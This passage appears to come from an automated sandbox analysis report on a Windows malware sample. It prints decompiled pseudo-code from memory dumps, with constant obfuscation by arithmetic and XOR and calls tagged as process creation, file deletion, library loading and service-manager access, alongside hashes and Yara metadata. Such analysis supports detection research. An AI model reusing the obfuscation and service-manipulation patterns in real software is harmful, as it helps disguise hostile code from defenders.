				E00226636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00226636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00237BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}









                                              0x00227b64
                                              0x00227b6f
                                              0x00227b72
                                              0x00227b75
                                              0x00227b76
                                              0x00227b77
                                              0x00227b7c
                                              0x00227b85
                                              0x00227b8c
                                              0x00227b90
                                              0x00227b97
                                              0x00227b9e
                                              0x00227ba5
                                              0x00227ba9
                                              0x00227bb0
                                              0x00227bbd
                                              0x00227bbe
                                              0x00227bc1
                                              0x00227bc8
                                              0x00227bcf
                                              0x00227bd6
                                              0x00227bda
                                              0x00227be1
                                              0x00227be8
                                              0x00227bf4
                                              0x00227bf7
                                              0x00227bfe
                                              0x00227c05
                                              0x00227c10
                                              0x00227c13
                                              0x00227c1a
                                              0x00227c21
                                              0x00227c25
                                              0x00227c29
                                              0x00227c30
                                              0x00227c37
                                              0x00227c3e
                                              0x00227c45
                                              0x00227c4c
                                              0x00227c53
                                              0x00227c5a
                                              0x00227c5e
                                              0x00227c65
                                              0x00227c6c
                                              0x00227c70
                                              0x00227c77
                                              0x00227c7a
                                              0x00227c81
                                              0x00227c8c
                                              0x00227c8f
                                              0x00227c96
                                              0x00227c9d
                                              0x00227ca1
                                              0x00227ca8
                                              0x00227caf
                                              0x00227cb6
                                              0x00227cbd
                                              0x00227cc4
                                              0x00227cc8
                                              0x00227ccf
                                              0x00227cd6
                                              0x00227cd9
                                              0x00227ce0
                                              0x00227ce7
                                              0x00227cee
                                              0x00227cf5
                                              0x00227cf9
                                              0x00227d00
                                              0x00227d07
                                              0x00227d12
                                              0x00227d15
                                              0x00227d1c
                                              0x00227d23
                                              0x00227d2a
                                              0x00227d33
                                              0x00227d3a
                                              0x00227d3e
                                              0x00227d42
                                              0x00227d49
                                              0x00227d50
                                              0x00227d53
                                              0x00227d5a
                                              0x00227d61
                                              0x00227d68
                                              0x00227d6f
                                              0x00227d73
                                              0x00227d77
                                              0x00227d7e
                                              0x00227d8a
                                              0x00227d8d
                                              0x00227d90
                                              0x00227d94
                                              0x00227d9b
                                              0x00227da2
                                              0x00227dad
                                              0x00227db4
                                              0x00227db7
                                              0x00227dbe
                                              0x00227dc9
                                              0x00227dcc
                                              0x00227dcf
                                              0x00227dd3
                                              0x00227dda
                                              0x00227de1
                                              0x00227de5
                                              0x00227dec
                                              0x00227df3
                                              0x00227dfa
                                              0x00227dfe
                                              0x00227e14
                                              0x00227e21
                                              0x00227e32
                                              0x00227e3a
                                              0x00227e4b
                                              0x00227e53
                                              0x00227e65
                                              0x00227e6d
                                              0x00227e7c
                                              0x00227e84
                                              0x00227e87
                                              0x00227e8a
                                              0x00227e90
                                              0x00227e93
                                              0x00227e99
                                              0x00227ea5
                                              0x00227eb2
                                              0x00227ebc
                                              0x00227ec4

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID: 6S5q$f''e
                                              • API String ID: 3080627654-2864536462
                                              • Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                              • Instruction ID: fb2ea85c7ee93b52c281820c0c594fe4e753e7464182d281f500c819c2ec6ec2
                                              • Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                              • Instruction Fuzzy Hash: 8DA1CEB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAD959CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022B41F, Relevance: 2.6, Strings: 2, Instructions: 76COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E0022B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00221000(_v40, _v12, _v36, _v32, E0023889D(_t93, _v8, _v16));
				_t95 =  *0x23ca28; // 0x4c3138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00232025(_v24, _t90, _v20, _v16);
			}



















                                              0x0022b425
                                              0x0022b429
                                              0x0022b430
                                              0x0022b437
                                              0x0022b43b
                                              0x0022b43f
                                              0x0022b446
                                              0x0022b44d
                                              0x0022b454
                                              0x0022b45b
                                              0x0022b462
                                              0x0022b469
                                              0x0022b470
                                              0x0022b477
                                              0x0022b484
                                              0x0022b48a
                                              0x0022b48d
                                              0x0022b491
                                              0x0022b495
                                              0x0022b49c
                                              0x0022b4a3
                                              0x0022b4aa
                                              0x0022b4b1
                                              0x0022b4b8
                                              0x0022b4bf
                                              0x0022b4c6
                                              0x0022b4d1
                                              0x0022b4d2
                                              0x0022b4d5
                                              0x0022b4d8
                                              0x0022b4dc
                                              0x0022b4e3
                                              0x0022b4ea
                                              0x0022b4f1
                                              0x0022b4f5
                                              0x0022b4fc
                                              0x0022b503
                                              0x0022b50e
                                              0x0022b511
                                              0x0022b51a
                                              0x0022b51d
                                              0x0022b524
                                              0x0022b53e
                                              0x0022b543
                                              0x0022b551
                                              0x0022b565

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: 81L$#
                                              • API String ID: 1029625771-3372316978
                                              • Opcode ID: 0ba7a23c5e6577c2b067fdea1e1256a043fff69f59f4017ad9f7b991f614a042
                                              • Instruction ID: bdbd862dbe7305b9903c7a193e31468df8da13e6d19c7ddccde24cd92461f820
                                              • Opcode Fuzzy Hash: 0ba7a23c5e6577c2b067fdea1e1256a043fff69f59f4017ad9f7b991f614a042
                                              • Instruction Fuzzy Hash: 4341ED72C0031AEBDB08CFA5C94A4EEBBB1FB54318F208599D411B62A4D7B90B58CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022568E, Relevance: 1.4, Strings: 1, Instructions: 184COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E0022568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0022602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002393A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0023976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00234F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00234F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}















                                              0x0022568f
                                              0x0022569b
                                              0x0022569e
                                              0x002256a0
                                              0x002256a2
                                              0x002256a5
                                              0x002256a8
                                              0x002256ab
                                              0x002256ac
                                              0x002256af
                                              0x002256b2
                                              0x002256b3
                                              0x002256b4
                                              0x002256b9
                                              0x002256c2
                                              0x002256cc
                                              0x002256cf
                                              0x002256d2
                                              0x002256d9
                                              0x002256e0
                                              0x002256e4
                                              0x002256ef
                                              0x002256f2
                                              0x002256f9
                                              0x00225700
                                              0x0022570e
                                              0x00225711
                                              0x00225718
                                              0x00225722
                                              0x00225727
                                              0x0022572c
                                              0x00225733
                                              0x0022573a
                                              0x00225745
                                              0x00225746
                                              0x00225749
                                              0x0022574d
                                              0x00225754
                                              0x0022575b
                                              0x0022575f
                                              0x00225763
                                              0x0022576a
                                              0x00225771
                                              0x0022577c
                                              0x0022577f
                                              0x00225786
                                              0x0022578d
                                              0x00225799
                                              0x0022579c
                                              0x002257a3
                                              0x002257aa
                                              0x002257b1
                                              0x002257b4
                                              0x002257bb
                                              0x002257c2
                                              0x002257ca
                                              0x002257cd
                                              0x002257d4
                                              0x002257db
                                              0x002257df
                                              0x002257e6
                                              0x002257ea
                                              0x002257f1
                                              0x002257f8
                                              0x00225801
                                              0x00225808
                                              0x0022580f
                                              0x00225816
                                              0x00225822
                                              0x00225827
                                              0x0022582c
                                              0x00225833
                                              0x0022583a
                                              0x00225841
                                              0x00225848
                                              0x0022584f
                                              0x00225856
                                              0x0022585d
                                              0x00225867
                                              0x0022586a
                                              0x0022586d
                                              0x00225874
                                              0x0022587b
                                              0x00225882
                                              0x00225889
                                              0x00225890
                                              0x0022589b
                                              0x002258a1
                                              0x002258a8
                                              0x002258af
                                              0x002258b2
                                              0x002258b9
                                              0x002258c0
                                              0x002258d3
                                              0x002258d6
                                              0x002258de
                                              0x00225915
                                              0x0022591f
                                              0x00225951
                                              0x00225921
                                              0x00225923
                                              0x0022593a
                                              0x00225948
                                              0x00225925
                                              0x00225928
                                              0x00225929
                                              0x0022592a
                                              0x0022592b
                                              0x0022592b
                                              0x0022592e
                                              0x0022592e
                                              0x00225959

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: @p
                                              • API String ID: 963392458-2609516012
                                              • Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                              • Instruction ID: d2c0ddd81a123bc7759a86a247bffa3c466b8026ac9240e27d5f2f2fc7516497
                                              • Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                              • Instruction Fuzzy Hash: F69114B2510248EFDF59CFA1C98A8CE3BA1FF44348F509119FE16961A0D3BAD995CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022C0C6, Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E0022C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00237BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0023889D(0x23c050, _v36, _v52));
				E00232025(_v16, _t154, _v44, _v56);
				_t159 = E0023AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}



























                                              0x0022c0d0
                                              0x0022c0d3
                                              0x0022c0d6
                                              0x0022c0d9
                                              0x0022c0da
                                              0x0022c0db
                                              0x0022c0e0
                                              0x0022c0e6
                                              0x0022c0ea
                                              0x0022c0f1
                                              0x0022c0f8
                                              0x0022c0ff
                                              0x0022c106
                                              0x0022c10a
                                              0x0022c111
                                              0x0022c11e
                                              0x0022c121
                                              0x0022c124
                                              0x0022c12b
                                              0x0022c132
                                              0x0022c139
                                              0x0022c140
                                              0x0022c147
                                              0x0022c14e
                                              0x0022c155
                                              0x0022c160
                                              0x0022c163
                                              0x0022c16a
                                              0x0022c171
                                              0x0022c17f
                                              0x0022c186
                                              0x0022c189
                                              0x0022c193
                                              0x0022c196
                                              0x0022c19d
                                              0x0022c1a4
                                              0x0022c1ab
                                              0x0022c1b5
                                              0x0022c1b8
                                              0x0022c1bb
                                              0x0022c1c2
                                              0x0022c1c9
                                              0x0022c1cd
                                              0x0022c1d4
                                              0x0022c1db
                                              0x0022c1e2
                                              0x0022c1e9
                                              0x0022c1f0
                                              0x0022c1f4
                                              0x0022c1fb
                                              0x0022c202
                                              0x0022c209
                                              0x0022c210
                                              0x0022c217
                                              0x0022c21e
                                              0x0022c225
                                              0x0022c229
                                              0x0022c230
                                              0x0022c237
                                              0x0022c23e
                                              0x0022c245
                                              0x0022c24c
                                              0x0022c253
                                              0x0022c257
                                              0x0022c25e
                                              0x0022c265
                                              0x0022c26e
                                              0x0022c277
                                              0x0022c27f
                                              0x0022c282
                                              0x0022c289
                                              0x0022c2ad
                                              0x0022c2bd
                                              0x0022c2d5
                                              0x0022c2e1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID: ~.
                                              • API String ID: 4033686569-2304494891
                                              • Opcode ID: 55c8e7fc88639b1511d95635a0b0345608d8418da22611c1ac8f21275ee59481
                                              • Instruction ID: 7a0dd3f810938763798439b4eed8cd330beba95872c25e850214a34e891f0498
                                              • Opcode Fuzzy Hash: 55c8e7fc88639b1511d95635a0b0345608d8418da22611c1ac8f21275ee59481
                                              • Instruction Fuzzy Hash: 675113B1C1121DEBDF48DFE5D94A8EEBBB2FB08304F208159E511B6260C7B91A58DF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00228736, Relevance: .1, Instructions: 56COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00228736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E0023981E(_t77, E0022C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}













                                              0x0022873c
                                              0x00228745
                                              0x00228749
                                              0x00228750
                                              0x00228754
                                              0x0022875b
                                              0x00228762
                                              0x00228766
                                              0x0022876d
                                              0x0022877b
                                              0x0022877d
                                              0x0022877e
                                              0x00228788
                                              0x0022878d
                                              0x00228791
                                              0x00228798
                                              0x0022879f
                                              0x002287a6
                                              0x002287ad
                                              0x002287b7
                                              0x002287bc
                                              0x002287c4
                                              0x002287c7
                                              0x002287ca
                                              0x002287ce
                                              0x002287ed
                                              0x002287f9

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                              • Instruction ID: 4f2177031d747ce27b074eddac9c8a45aba2a1173f3e9bff45be6ddb25a6703e
                                              • Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                              • Instruction Fuzzy Hash: 33214271D00209EBEB08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00222959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0022602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x0022295f
                                              0x00222964
                                              0x00222967
                                              0x0022296a
                                              0x0022296d
                                              0x0022296e
                                              0x0022296f
                                              0x00222977
                                              0x00222985
                                              0x0022298a
                                              0x00222992
                                              0x0022299a
                                              0x002229a2
                                              0x002229a9
                                              0x002229b0
                                              0x002229b7
                                              0x002229bb
                                              0x002229cf
                                              0x002229dc
                                              0x002229e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
